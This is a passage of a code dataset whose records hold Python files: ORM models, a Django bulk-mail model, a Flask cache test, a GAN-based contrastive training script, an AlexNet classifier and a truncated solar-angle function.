print(Y)\n","sub_path":"DL/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226913111","text":"from sqlalchemy.ext.hybrid import hybrid_property\n\nfrom DB.BaseModel import BaseModel\nfrom World.Object.Constants.TypeMask import TypeMask\nfrom World.Object.Constants.ObjectType import ObjectType\n\nfrom Config.Run.config import Config\n\n\nclass Object(BaseModel):\n\n id = BaseModel.column(type='integer', primary_key=True)\n entry = BaseModel.column(type='integer')\n scale_x = BaseModel.column(type='float', default=Config.World.Object.Defaults.scale_x)\n\n __table_args__ = {\n 'schema': Config.Database.DBNames.realm_db\n }\n\n @hybrid_property\n def object_type(self):\n return ObjectType.OBJECT.value\n\n @hybrid_property\n def type_mask(self):\n return TypeMask.OBJECT.value\n\n @hybrid_property\n def high_guid(self):\n return None\n\n @hybrid_property\n def guid(self):\n _guid = self.id\n\n if hasattr(self, 'low_guid'):\n _guid = self.low_guid | (self.high_guid << 48)\n\n if bool(self.entry):\n _guid = (self.low_guid |\n (self.entry << 24) |\n (self.high_guid << 48))\n\n return _guid\n\n @hybrid_property\n def packed_guid(self):\n pack_guid = bytearray(8 + 1)\n size = 1\n index = 0\n\n guid = self.guid\n\n while guid:\n if guid & 0xff > 0:\n pack_guid[0] |= (1 << index)\n pack_guid[size] = guid & 0xff\n size += 1\n\n index += 1\n guid >>= 8\n\n return bytes(pack_guid[:size])\n","sub_path":"World/Object/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"654247851","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n# Create your models here.\nfrom ckeditor.fields import RichTextField\nfrom multi_email_field.fields import MultiEmailField\nfrom datetime import datetime\nfrom .validators import validate_file_extension\nfrom .storages import OverwriteStorage\n\nSTATUS_CHOICES = (\n ('n', u'Новaя'),\n ('p', u'В процессе'),\n ('f', u'Завершена'),\n)\n\n\nclass MassSender(models.Model):\n\n class Meta:\n verbose_name = u'рассылку'\n verbose_name_plural = u'рассылки'\n\n sender_name_desc = models.CharField(\n u'Имя отправителя', max_length=100, null=True)\n sender_name = models.EmailField(u'Отправить от', max_length=50)\n bcc_list = MultiEmailField(u'Кому:', null=True,\n help_text=u'Добавьте список для рассылки по одному 
адресу в строке')\n    mail_subject = models.CharField(u'Тема письма', max_length=200, null=True)\n    mailbody = RichTextField(u'Тело письма')\n    mail_attachment = models.FileField(\n        u'Вложение',\n        validators=[validate_file_extension],\n        storage=OverwriteStorage())\n    pub_date = models.DateTimeField(\n        u'Дата добавления рассылки',\n        editable=False,\n        default=datetime.now)\n    status = models.CharField(\n        u'Статус рассылки',\n        max_length=1,\n        choices=STATUS_CHOICES,\n        editable=False,\n        default='n')\n    send_date = models.DateTimeField(\n        u'Дата отправки рассылки',\n        editable=False,\n        blank=True,\n        null=True)\n\n\n    def __unicode__(self):\n        return self.sender_name\n","sub_path":"Sender/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"584552043","text":"from flask import Flask\nfrom flask.ext.cache import Cache\n\n\napp = Flask(__name__)\ncache = Cache(app, config={'CACHE_TYPE': 'simple'})\n\n\n@app.route('/index')\n@cache.cached()\ndef index():\n    print(\"index called\")\n    return \"Hello World\"\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080)\n","sub_path":"app/test/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"420162341","text":"from __future__ import print_function\nimport math\nfrom torch.multiprocessing import Pool\nimport functools\n\nimport numpy as np\nimport pdb\nimport os\nimport sys\nimport argparse\nimport time\n\nimport torchvision.utils as vutils\nfrom torch.utils.data import *\nimport tensorboard_logger as tb_logger\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torchvision import transforms, datasets\nfrom torchvision.transforms import functional\n\nfrom util import TwoCropTransform, AverageMeter, GansetDataset, GansteerDataset\nfrom util import adjust_learning_rate, warmup_learning_rate\nfrom util import set_optimizer, save_model\nfrom networks.resnet_big import SupConResNet\nfrom losses import SupConLoss\nimport oyaml as yaml\nimport pbar as pbar\n\nimport io\nimport IPython.display\nimport PIL.Image\nfrom pprint import pformat\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport tensorflow_hub as hub\nfrom scipy.stats import truncnorm\nimport utils_bigbigan as ubigbi\nfrom tqdm import tqdm\nimport json\nimport pickle\nfrom tensorflow.python.client import device_lib\n\nfrom pytorch_pretrained_biggan import (\n    BigGAN,\n    truncated_noise_sample,\n    one_hot_from_int\n)\n\n\ntry:\n    import apex\n    from apex import amp, optimizers\nexcept ImportError:\n    pass\n\n\ndef parse_option():\n    parser = argparse.ArgumentParser('argument for training')\n    parser.add_argument('--encoding_type', type=str, default='contrastive',\n                        choices=['contrastive', 'crossentropy', 'autoencoding'])\n    parser.add_argument('--print_freq', type=int, default=1,\n                        help='print frequency')\n    parser.add_argument('--save_freq', type=int, default=5,\n                        help='save frequency')\n    parser.add_argument('--batch_size', type=int, default=256,\n                        help='batch_size')\n\n    parser.add_argument('--batch_size_gen', type=int, default=86,\n                        help='batch_size')\n\n    parser.add_argument('--num_workers', type=int, default=16,\n                        help='num of workers to use')\n    parser.add_argument('--epochs', type=int, default=200,\n                        help='number of training epochs')\n    parser.add_argument('--showimg', action='store_true', help='display image in 
tensorboard')\n\n parser.add_argument('--resume', default='', type=str, help='whether to resume training')\n parser.add_argument('--niter', type=int, default=256, help='number of iter for online sampling')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=0.03,\n help='learning rate')\n parser.add_argument('--lr_decay_epochs', type=str, default='120,160',\n help='where to decay lr, can be a list')\n parser.add_argument('--lr_decay_rate', type=float, default=0.1,\n help='decay rate for learning rate')\n parser.add_argument('--weight_decay', type=float, default=1e-4,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n # model dataset\n parser.add_argument('--model', type=str, default='resnet50')\n parser.add_argument('--dataset', type=str, default='biggan',\n choices=['biggan', 'cifar10', 'cifar100', 'imagenet100', 'imagenet100K', 'imagenet'], help='dataset')\n\n ## Ali: todo: this should be based on opt.encoding type and remove the default (revisit every default) and name of the model for saving\n # method\n parser.add_argument('--numcontrast', type=int, default=20,\n help='num of workers to use')\n parser.add_argument('--method', type=str, default='SimCLR',\n choices=['SupCon', 'SimCLR'], help='choose method')\n parser.add_argument('--walk_method', type=str, choices=['none', 'random', 'steer', 'pca'], help='choose method')\n\n # temperature\n parser.add_argument('--temp', type=float, default=0.1,\n help='temperature for loss function')\n\n # other setting\n parser.add_argument('--cosine', action='store_true', help='using cosine annealing')\n parser.add_argument('--syncBN', action='store_true',\n help='using synchronized batch normalization')\n parser.add_argument('--warm', action='store_true',\n help='warm-up for large batch training')\n parser.add_argument('--trial', type=str, default='0',\n help='id for recording multiple runs')\n\n # specifying folders\n parser.add_argument('-d', '--data_folder', type=str,\n default='/data/scratch-oc40/jahanian/ganclr_results/ImageNet100',\n help='the data folder')\n parser.add_argument('-s', '--cache_folder', type=str,\n default='/data/scratch-oc40/jahanian/ganclr_results/',\n help='the saving folder')\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n opt.data_folder = opt.data_folder\n opt.model_path = os.path.join(opt.cache_folder, '{}_online/{}_models'.format(opt.method, opt.dataset))\n opt.tb_path = os.path.join(opt.cache_folder, '{}_online/{}_tensorboard'.format(opt.method, opt.dataset))\n\n iterations = opt.lr_decay_epochs.split(',')\n opt.lr_decay_epochs = list([])\n for it in iterations:\n opt.lr_decay_epochs.append(int(it))\n\n opt.model_name = '{}_{}onlineMP_{}_{}_ncontrast.{}_lr_{}_decay_{}_bsz_{}_temp_{}_trial_{}'.\\\n format(opt.method, opt.dataset, opt.walk_method, opt.model, opt.numcontrast, opt.learning_rate, \n opt.weight_decay, opt.batch_size, opt.temp, opt.trial)\n\n\n if opt.cosine:\n opt.model_name = '{}_cosine'.format(opt.model_name)\n\n opt.model_name = '{}_{}'.format(opt.model_name, os.path.basename(opt.data_folder))\n # warm-up for large-batch training,\n if opt.batch_size > 256:\n opt.warm = True\n if opt.warm:\n opt.model_name = '{}_warm'.format(opt.model_name)\n opt.warmup_from = 0.01\n opt.warm_epochs = 10\n if opt.cosine:\n eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)\n opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (\n 1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2\n else:\n 
opt.warmup_to = opt.learning_rate\n \n opt.tb_folder = os.path.join(opt.tb_path, opt.model_name)\n if not os.path.isdir(opt.tb_folder):\n os.makedirs(opt.tb_folder)\n\n opt.save_folder = os.path.join(opt.model_path, opt.model_name)\n if not os.path.isdir(opt.save_folder):\n os.makedirs(opt.save_folder)\n\n if opt.dataset == 'biggan' or opt.dataset == 'imagenet100' or opt.dataset == 'imagenet100K' or opt.dataset == 'imagenet':\n if opt.method == 'SimCLR':\n opt.img_size = 128\n else:\n opt.img_size = 128\n elif opt.dataset == 'cifar10' or opt.dataset == 'cifar100':\n opt.img_size = 32\n\n return opt\n\n\ndef worker_func(x):\n print(\"Wrker\", x)\n torch.cuda.set_device(x+1)\ndef set_loader(opt):\n # construct data loader\n if opt.dataset == 'cifar10':\n mean = (0.4914, 0.4822, 0.4465)\n std = (0.2023, 0.1994, 0.2010)\n elif opt.dataset == 'cifar100':\n mean = (0.5071, 0.4867, 0.4408)\n std = (0.2675, 0.2565, 0.2761)\n elif opt.dataset == 'biggan' or opt.dataset == 'imagenet100' or opt.dataset == 'imagenet100K' or opt.dataset == 'imagenet':\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n normalize = transforms.Normalize(mean=mean, std=std)\n opt.mean = mean\n opt.std = std\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=int(opt.img_size*0.875), scale=(0.2, 1.)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([\n transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)\n ], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.ToTensor(),\n normalize,\n ])\n# gan_model_name='biggan-deep-256'\n gan_model_name = 'https://tfhub.dev/deepmind/bigbigan-resnet50/1' # ResNet-50\n dataset = OnlineGanDataset(train_transform, gan_model_name, opt=opt)\n dataset.offset_start = 85 * opt.niter \n all_epochs_sampler = BatchSampler(SequentialSampler(dataset), batch_size=opt.batch_size_gen, drop_last=False)\n data_loader = DataLoader(dataset, batch_size=None, sampler=all_epochs_sampler, \n num_workers=opt.num_workers, worker_init_fn=worker_func, multiprocessing_context='spawn')\n\n return data_loader\n\ndef trans_func(single_image, transform):\n pil_image = functional.to_pil_image(single_image[0])\n return transform(pil_image)\n\nclass OnlineGanDataset(Dataset):\n def __init__(self, transform, gan_model_name, opt):\n\n self.transform = transform\n self.gan_model_name = gan_model_name\n self.offset_start = 0\n self.opt = opt\n self.gan_model = None\n self.func = functools.partial(trans_func, transform=transform)\n# with open('./utils/imagenet100_class_index.json', 'rb') as fid: \n with open('./utils/imagenet_class_index.json', 'rb') as fid: \n imagenet_class_index_dict = json.load(fid)\n self.idx_imagenet100 = list(map(int, list(imagenet_class_index_dict.keys())))\n\n\n def get_available_gpus(self):\n local_device_protos = device_lib.list_local_devices()\n return [x.name for x in local_device_protos if x.device_type == 'GPU']\n\n# def lazy_init_gan(self):\n# if self.gan_model is None:\n# print(\"initializing GAN\", torch.cuda.device_count(), torch.cuda.current_device())\n# module = hub.Module(self.gan_model_name) # inference\n# self.gpu_idx_current = torch.cuda.current_device()\n# self.gan_model = ubigbi.BigBiGAN(module)\n# self.gen_ph = self.gan_model.make_generator_ph()\n# # Compute samples G(z) from encoder input z (`gen_ph`).\n# self.gen_samples = self.gan_model.generate(self.gen_ph)\n# ## Create a TensorFlow session and initialize variables\n# init = 
tf.global_variables_initializer()\n# self.sess = tf.Session()\n# self.sess.run(init)\n# print('lazy_init: get_available_gpus()', self.get_available_gpus())\n\n def lazy_init_gan(self):\n start_time = time.time()\n if self.gan_model is None:\n print(\"initializing GAN on {} GPUs, currently on GPU:{}\".format(torch.cuda.device_count(),\n torch.cuda.current_device()))\n self.gpu_idx_current = torch.cuda.current_device()\n\n with tf.device('/gpu:{}'.format(self.gpu_idx_current)):\n module = hub.Module(self.gan_model_name) # inference\n self.gan_model = ubigbi.BigBiGAN(module)\n self.gen_ph = self.gan_model.make_generator_ph()\n self.gen_samples = self.gan_model.generate(self.gen_ph)\n \n# self.sess = tf.Session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True))\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\n\n init = tf.global_variables_initializer()\n self.sess.run(init)\n print('spent time to init device GPU:{} is {}'.format(torch.cuda.current_device(), time.time() - start_time))\n# print('lazy_init: get_available_gpus()', self.get_available_gpus())\n\n def apply_im_transform(self, anchor_out):\n anchor_out = 255 * ((anchor_out + 1.0)/2.0)\n anchor_out = anchor_out.detach().cpu().numpy()\n anchor_out = anchor_out.astype(np.uint8)\n anchor_out = np.transpose(anchor_out, [0, 2, 3, 1])\n anchor_out = np.split(anchor_out, anchor_out.shape[0])\n images_anchor = map(self.func, anchor_out)\n images_anchor = np.concatenate([x[None,:] for x in images_anchor])\n images_anchor = torch.from_numpy(images_anchor)\n return images_anchor\n \n def __len__(self):\n # Since we are skipping samples on every iteration\n # On every iteration we skip batch % batch_gen\n # niter / batch * batch mod batch_gen\n batch_size = self.opt.batch_size\n skipped = (self.opt.niter // batch_size) * (self.opt.batch_size_gen % batch_size)\n return (self.opt.niter + skipped) * self.opt.epochs\n \n def __getitem__(self, indices):\n start_time = time.time()\n self.lazy_init_gan()\n truncation = 1.0\n std_scale = 0.2\n batch_size = len(indices)\n \n start_seed = 0\n idx = indices[0] + self.offset_start\n# seed = start_seed + 2 * idx\n seed = None\n state = None if seed is None else np.random.RandomState(seed)\n zs = truncation * truncnorm.rvs(-2, 2, size=(batch_size, 120), random_state=state).astype(np.float32)\n feed_dict = {self.gen_ph: zs}\n# print('__getitem__: get_available_gpus()', self.get_available_gpus())\n\n# with tf.device('/device:GPU:{}'.format(self.gpu_idx_current)):\n anchor_out = self.sess.run(self.gen_samples, feed_dict=feed_dict)\n \n anchor_out = np.transpose(anchor_out, (0, 3, 1, 2))\n anchor_out = torch.from_numpy(anchor_out).cuda()\n \n# anchor_out = anchor_out[:,:,0:112, 0:112]\n# ims = torch.tensor(anchor_out, dtype=torch.float32, device='cuda') #<== might need to manage between TF and those used for encoder\n# images.append(ims)\n\n \n# zs = torch.from_numpy(zs)\n zsold = zs\n idx_cls = np.random.choice(self.idx_imagenet100, batch_size)\n# class_vector = one_hot_from_int(idx_cls, batch_size=batch_size)\n# class_vector = torch.from_numpy(class_vector)\n# zs = zs.cuda()\n# class_vector = class_vector.cuda()\n #model_biggan.to(f'cuda:{model_biggan.device_ids[0]}')\n# with torch.no_grad():\n# anchor_out = self.gan_model(zs, class_vector, truncation)\n\n# seed = start_seed + 2 * idx + 1\n seed = None\n state = None if seed is None else np.random.RandomState(seed)\n ws = truncation * truncnorm.rvs(-2, 2, size=(batch_size, 120), scale=std_scale, 
random_state=state).astype(np.float32)\n zs = zs + ws\n feed_dict = {self.gen_ph: zs}\n# with tf.device('/device:GPU:{}'.format(self.gpu_idx_current)):\n anchor_out2 = self.sess.run(self.gen_samples, feed_dict=feed_dict)\n \n anchor_out2 = np.transpose(anchor_out2, (0, 3, 1, 2))\n anchor_out2 = torch.from_numpy(anchor_out2).cuda()\n \n images_anchor = self.apply_im_transform(anchor_out)\n images_anchor2 = self.apply_im_transform(anchor_out2)\n# print('loader spent time', time.time() - start_time)\n return images_anchor, images_anchor2, idx_cls\n\ndef set_model(opt):\n if opt.encoding_type == 'contrastive':\n model = SupConResNet(name=opt.model, img_size=int(opt.img_size*0.875))\n criterion = SupConLoss(temperature=opt.temp)\n\n elif opt.encoding_type == 'crossentropy':\n model = SupCEResNet(name=opt.model, num_classes=opt.n_cls, img_size=int(opt.img_size*0.875))\n criterion = torch.nn.CrossEntropyLoss()\n\n elif opt.encoding_type == 'autoencoding':\n print(\"TODO(ali): Implement here\")\n raise NotImplementedError\n\n # enable synchronized Batch Normalization\n if opt.syncBN:\n model = apex.parallel.convert_syncbn_model(model)\n\n if torch.cuda.is_available():\n if torch.cuda.device_count() > 1:\n model.encoder = torch.nn.DataParallel(model.encoder, device_ids=[0])\n model = model.cuda()\n criterion = criterion.cuda()\n cudnn.benchmark = True\n\n return model, criterion\n\n\ndef train(data_loader_iterator, model, criterion, optimizer, epoch, opt, start_seed):\n \"\"\"one epoch training\"\"\"\n model.train()\n \n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n\n top1 = AverageMeter()\n end = time.time()\n\n print(\"Start train\")\n count = opt.niter // opt.batch_size\n ratio_gen_to_consumer = math.ceil(opt.batch_size / opt.batch_size_gen)\n iter_num = 0\n while iter_num < count:\n idx = iter_num\n iter_num += 1\n data_batch = []\n for it in range(ratio_gen_to_consumer):\n data = next(data_loader_iterator)\n data_batch.append(data)\n\n\n data = [torch.cat(tensor_val) for tensor_val in zip(*data_batch)]\n# print(data[0].shape)\n data = [tensor_val[:opt.batch_size] for tensor_val in data]\n if len(data) == 2:\n images = data[0]\n labels = data[1]\n elif len(data) == 3:\n images = data[:2]\n labels = data[2]\n else:\n raise NotImplementedError\n data_time.update(time.time() - end)\n if opt.encoding_type != 'contrastive':\n # We only pick one of images\n images = images[1]\n else:\n ims = images[0]\n anchors = images[1]\n images = torch.cat([images[0].unsqueeze(1), images[1].unsqueeze(1)],\n dim=1)\n # print('2) images shape', images.shape)\n\n images = images.view(-1, 3, int(opt.img_size*0.875), int(opt.img_size*0.875)).cuda(non_blocking=True)\n # print('3) images shape', images.shape)\n\n # labels = labels.cuda(non_blocking=True) <== do we need non_blocking for idx_cls?\n bsz = labels.shape[0]\n # warm-up learning rate\n warmup_learning_rate(opt, epoch, idx, opt.niter, optimizer)\n # compute loss\n\n\n if opt.encoding_type == 'contrastive':\n features = model(images)\n features = features.view(bsz, 2, -1)\n if opt.method == 'SupCon':\n loss = criterion(features, labels)\n elif opt.method == 'SimCLR':\n loss = criterion(features)\n else:\n raise ValueError('contrastive method not supported: {}'.\n format(opt.method))\n elif opt.encoding_type == 'crossentropy':\n output = model(images)\n loss = criterion(output, labels)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n else:\n raise NotImplementedError\n\n\n # update metric\n 
losses.update(loss.item(), bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n print('time spent per batch:', batch_time.avg)\n # print info\n if (idx + 1) % opt.print_freq == 0:\n if opt.encoding_type == 'crossentropy':\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, count, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n else:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})'.format(\n epoch, idx + 1, count, batch_time=batch_time,\n data_time=data_time, loss=losses))\n sys.stdout.flush()\n other_metrics = {}\n\n if opt.encoding_type == 'crossentropy':\n other_metrics['top1_acc'] = top1.avg\n\n if opt.showimg:\n other_metrics['image'] = [ims[:8], anchors[:8]]\n\n return losses.avg, other_metrics\n\n\ndef trans_func(single_image, transform):\n pil_image = functional.to_pil_image(single_image[0])\n return transform(pil_image)\n\ndef main():\n opt = parse_option()\n \n print('train config:', opt)\n\n with open(os.path.join(opt.save_folder, 'train_config.yml'), 'w') as f:\n yaml.dump(vars(opt), f, default_flow_style=False)\n \n # One GPU is used for consuming, the rest for generating\n num_gpus = torch.cuda.device_count() - 1\n if opt.batch_size_gen == -1:\n opt.batch_size_gen = math.ceil(opt.batch_size / (num_gpus))\n\n # build data loader\n # opt.encoding_type tells us how to get training data\n opt.niter = 1300000\n opt.num_workers = min(opt.num_workers, torch.cuda.device_count() - 1)\n# opt.num_workers = 1\n train_loader = set_loader(opt)\n\n # build model and criterion\n # opt.encoding_type tells us what to put as the head; choices are:\n # contrastive -> mlp or linear\n # crossentropy -> one linear for pred_y\n # autoencoding -> one linear for pred_z and one linear for pred_y\n model, criterion = set_model(opt)\n\n # build optimizer\n optimizer = set_optimizer(opt, model)\n\n # tensorboard\n logger = tb_logger.Logger(logdir=opt.tb_folder, flush_secs=2)\n\n # Start the data loader\n\n # training routine\n train_loader_iterator = iter(train_loader)\n init_epoch = 1\n\n if len(opt.resume) > 0:\n model_ckp = torch.load(opt.resume)\n init_epoch = model_ckp['epoch'] + 1\n model.load_state_dict(model_ckp['model'])\n optimizer.load_state_dict(model_ckp['optimizer'])\n\n for epoch in range(init_epoch, opt.epochs + 1):\n adjust_learning_rate(opt, optimizer, epoch)\n\n # train for one epoch\n time1 = time.time()\n loss, other_metrics = train(train_loader_iterator, model, criterion, optimizer, epoch, opt, start_seed=0)\n time2 = time.time()\n print('epoch {}, total time {:.2f}'.format(epoch, time2 - time1))\n\n # tensorboard logger\n logger.log_value('loss', loss, epoch)\n logger.log_value('learning_rate', optimizer.param_groups[0]['lr'], epoch)\n for metric_name, metric_value in other_metrics.items():\n if metric_name == 'image':\n images = metric_value\n anchors = images[0]\n otherims = images[1]\n bs = anchors.shape[0]\n grid_images = vutils.make_grid(\n torch.cat((anchors, otherims)), nrow=bs)\n grid_images *= np.array(opt.std)[:, None, None]\n grid_images += np.array(opt.mean)[:, None, None]\n grid_images = 
(255*grid_images.cpu().numpy()).astype(np.uint8)\n grid_images = grid_images[None, :].transpose(0,2,3,1)\n logger.log_images(metric_name, grid_images, epoch)\n else:\n logger.log_value(metric_name, metric_value, epoch)\n\n if epoch % opt.save_freq == 0:\n save_file = os.path.join(\n opt.save_folder, 'ckpt_epoch_{epoch}.pth'.format(epoch=epoch))\n save_model(model, optimizer, opt, epoch, save_file)\n\n # save the last model\n save_file = os.path.join(\n opt.save_folder, 'last.pth')\n save_model(model, optimizer, opt, opt.epochs, save_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"online_learning/main_unified_online_mp_v2.py","file_name":"main_unified_online_mp_v2.py","file_ext":"py","file_size_in_byte":23509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358049565","text":"import os\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nbasedir = './dataset/'\r\ntrain_dir = os.path.join(basedir, 'train/')\r\nval_dir = os.path.join(basedir, 'validation/')\r\ntrain_cats_dir = os.path.join(train_dir, 'cats/')\r\ntrain_dogs_dir = os.path.join(train_dir, 'dogs/')\r\nval_cats_dir = os.path.join(val_dir, 'cats/')\r\nval_dogs_dir = os.path.join(val_dir, 'dogs/')\r\ntotal_train = len(os.listdir(train_dir))\r\ntotal_val = len(os.listdir(val_dir))\r\n\r\n\r\n\r\n\r\n# 该函数将图像绘制成1行5列的网格形式,图像放置在每一列中。\r\ndef plotImages(images_arr):\r\n fig, axes = plt.subplots(1, 5, figsize=(20, 20))\r\n axes = axes.flatten()\r\n for img, ax in zip(images_arr, axes):\r\n ax.imshow(img)\r\n ax.axis('off')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\ntrain_image_generate = tf.keras.preprocessing.image.ImageDataGenerator(\r\n rescale=1./255,\r\n rotation_range=45,\r\n width_shift_range=.15,\r\n height_shift_range=.15,\r\n horizontal_flip=True,\r\n zoom_range=0.5\r\n)\r\nbatch_size = 128\r\nIMG_HEIGHT = 224\r\nIMG_WIDTH = 224\r\nepochs = 10\r\n\r\ntrain_data_generate = train_image_generate.flow_from_directory(\r\n batch_size=batch_size,\r\n directory=train_dir,\r\n shuffle=True,\r\n target_size=(IMG_HEIGHT, IMG_WIDTH),\r\n class_mode='binary'\r\n)\r\n\r\n\r\n\r\nval_image_generate = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1. 
/ 255)\r\n\r\n\r\nval_data_generate = val_image_generate.flow_from_directory(batch_size=batch_size,\r\n directory=val_dir,\r\n target_size=(IMG_HEIGHT, IMG_WIDTH),\r\n class_mode='binary')\r\n\r\n\r\n\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n# 第一个卷积层\r\n tf.keras.layers.Conv2D(filters=96, kernel_size=(11, 11), strides=(4, 4), padding='valid', activation='relu',\r\n input_shape=(IMG_WIDTH, IMG_HEIGHT, 3)),\r\n # 第一个参数为卷积核个数,第二个参数为卷积核尺寸,为(width, height),如果两者相同,用一个数字即可\r\n tf.keras.layers.BatchNormalization(),\r\n\r\n tf.keras.layers.MaxPooling2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n #第二个卷积层\r\n tf.keras.layers.Conv2D(filters=256, kernel_size=(5, 5), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.BatchNormalization(),\r\n tf.keras.layers.MaxPool2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n # 第三-五卷积层\r\n tf.keras.layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.MaxPool2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n # 第六-八连接层\r\n\r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dense(4096, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(4096, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(1000, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n\r\n # 输出\r\n tf.keras.layers.Dense(2),\r\n tf.keras.layers.Activation('softmax')\r\n])\r\n\r\n\r\n\r\nmodel.compile(optimizer='sgd',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n# categorical_crossentropy与softmax匹配使用\r\n#sigmoid 与二进制交叉熵损失函数BinaryCrossentropy(from_logits=True)\r\n# 因为模型最后一层的sotfmax已经概率化输出了,所以from_logits=False,如果输出最后结果没有\r\n#进行激活函数sigmoid的映射之类的就设置成True\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit_generator(\r\n train_data_generate,\r\n steps_per_epoch=total_train // batch_size,\r\n epochs=epochs,\r\n validation_data=val_data_generate,\r\n validation_steps=total_val // batch_size\r\n)\r\n\r\n\r\n# 可视化模型\r\nacc = history.history['accuracy']\r\nval_acc = history.history['val_accuracy']\r\n\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs_range = range(epochs)\r\n\r\nplt.figure(figsize=(8, 8))\r\nplt.subplot(1, 2, 1)\r\nplt.plot(epochs_range, acc, label='Training Accuracy')\r\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\r\nplt.legend(loc='lower right')\r\nplt.title('Training and Validation Accuracy')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(epochs_range, loss, label='Training Loss')\r\nplt.plot(epochs_range, val_loss, label='Validation Loss')\r\nplt.legend(loc='upper right')\r\nplt.title('Training and Validation Loss')\r\n\r\n\r\nplt.show()","sub_path":"AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":4947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319282209","text":"# 阳光角度\nimport math\nimport time\nimport datetime\n\n\ndef solarAngles(longitude,latitude):\n longi = longitude\n lati = latitude\n localtime = time.localtime(time.time())\n dec = 23.45*math.sin(math.radians(360*(284+localtime.tm_yday)/365))\n if(longi>0):\n a = 1\n else:\n a = -1\n timezone = int((longi+7.5*(a))/15)\n UTCh = 
